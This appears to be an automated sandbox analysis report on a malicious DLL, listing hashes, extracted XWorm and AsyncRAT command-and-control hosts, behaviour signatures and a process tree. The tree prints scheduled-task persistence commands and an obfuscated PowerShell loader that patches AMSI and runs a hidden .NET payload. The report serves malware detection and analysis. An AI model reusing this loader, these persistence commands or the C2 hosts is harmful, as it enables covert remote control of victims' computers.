Analysis

  • max time kernel
    1226s
  • max time network
    1228s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-06-2024 05:58

Errors

Reason
Machine shutdown

General

  • Target

    ogg.dll

  • Size

    36KB

  • MD5

    0602f672ba595716e64ec4040e6de376

  • SHA1

    b00735e08b821aa9fc5850084ae057b5f618fb2a

  • SHA256

    4a4f65427e016b3c5ae0d2517a69db5f1cdc7a43d2c0a7957e8da5d6f378f063

  • SHA512

    9c03bc45c6bfc9f323802813a040992789b99cb961bf43b6e7536e3a379e3c22ea2fc86998c005c6ff1264f6081458a8de9c827a5f5d6a9c065ad7484e796ede

  • SSDEEP

    384:NXdNw/aVFvp0mOn4bM/ey7mlDHloAuTEmoq4NEywNJpTo90eTR2F:XNbFB0lv/ehuTEX7NEtbTo93TY

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:428
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1923dcfb-2d6d-4177-b724-07d1bfc48873}
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:7456
          • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:7224
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:8064
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                5⤵
                  PID:8048
            • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
              "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
              3⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:7332
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
                4⤵
                  PID:6988
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    5⤵
                      PID:7016
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
                      5⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:6956
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp79AF.tmp.bat""
                    4⤵
                    • Modifies data under HKEY_USERS
                    PID:8456
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      5⤵
                        PID:6980
                      • C:\Windows\system32\timeout.exe
                        timeout 3
                        5⤵
                        • Delays execution with timeout.exe
                        PID:1312
                  • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                    "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of SetWindowsHookEx
                    PID:5076
                • C:\Windows\system32\LogonUI.exe
                  "LogonUI.exe" /flags:0x4 /state0:0xa3998855 /state1:0x41c64e6d
                  2⤵
                  • Modifies data under HKEY_USERS
                  • Suspicious use of SetWindowsHookEx
                  PID:3956
              • C:\Windows\system32\lsass.exe
                C:\Windows\system32\lsass.exe
                1⤵
                  PID:700
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  1⤵
                    PID:1000
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:616
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:996
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1092
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          • Suspicious use of UnmapMainImage
                          PID:1100
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RuIdwLFZdpne{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UVutwbAoqZVCtH,[Parameter(Position=1)][Type]$igcSbrqbOz)$apNYbVnfyTC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'em'+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+'t'+'eTy'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+'nsi'+[Char](67)+'la'+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$apNYbVnfyTC.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$UVutwbAoqZVCtH).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');$apNYbVnfyTC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+'B'+'yS'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$igcSbrqbOz,$UVutwbAoqZVCtH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $apNYbVnfyTC.CreateType();}$wrKoaJuctLjFo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$YddLyJKHpNyhAu=$wrKoaJuctLjFo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAimDKIDCiENaekgzNL=RuIdwLFZdpne @([String])([IntPtr]);$HjoRkpFocncOZqvdSwRmVO=RuIdwLFZdpne @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FUdCvLhuypo=$wrKoaJuctLjFo.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'32'+'.'+''+[Char](100)+'l'+[Char](108)+'')));$kISoJahlEZayRd=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object]('Lo'+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$YFkSeGHziLwnHaMZL=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$FUdCvLhuypo,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$hKSadWt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kISoJahlEZayRd,$aAimDKIDCiENaekgzNL).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uPCrjwIokZiHlzXfl=$YddLyJKHpNyhAu.Invoke($Null,@([Object]$hKSadWt,[Object]('A'+'m'+''+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'uff'+[Char](101)+''+[Char](114)+'')));$DrKsXoMSIW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,4,[ref]$DrKsXoMSIW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uPCrjwIokZiHlzXfl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YFkSeGHziLwnHaMZL,$HjoRkpFocncOZqvdSwRmVO).Invoke($uPCrjwIokZiHlzXfl,[uint32]8,0x20,[ref]$DrKsXoMSIW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6964
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:7172
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:4640
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:4508
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6444
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:2248
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:3904
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:1476
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:5676
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6292
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:7188
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6020
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6304
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:8968
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6904
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:1052
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:1644
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:7672
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:3900
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:5032
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:9124
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            1⤵
                              PID:1116
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1212
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1272
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1284
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1324
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2276
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                                        1⤵
                                          PID:1368
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          1⤵
                                          • Drops file in System32 directory
                                          PID:1468
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          1⤵
                                            PID:1520
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1536
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1632
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1680
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                  1⤵
                                                    PID:1708
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                    1⤵
                                                      PID:1792
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1864
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1944
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1952
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1184
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1436
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2096
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2164
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2372
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2408
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                        1⤵
                                                                          PID:2416
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2476
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2504
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2568
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2600
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                1⤵
                                                                                  PID:2620
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                  1⤵
                                                                                    PID:2648
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:780
                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                      1⤵
                                                                                        PID:2764
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • NTFS ADS
                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:3300
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1764
                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                            rundll32.exe C:\Users\Admin\AppData\Local\Temp\ogg.dll,#1
                                                                                            3⤵
                                                                                              PID:2780
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 448
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:1576
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                            2⤵
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:5004
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb10ceab58,0x7ffb10ceab68,0x7ffb10ceab78
                                                                                              3⤵
                                                                                                PID:4520
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
                                                                                                3⤵
                                                                                                  PID:3236
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:5016
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                    3⤵
                                                                                                      PID:676
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:4644
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:5044
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4132 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:3316
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                            3⤵
                                                                                                              PID:2576
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:2928
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4252 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                3⤵
                                                                                                                  PID:1604
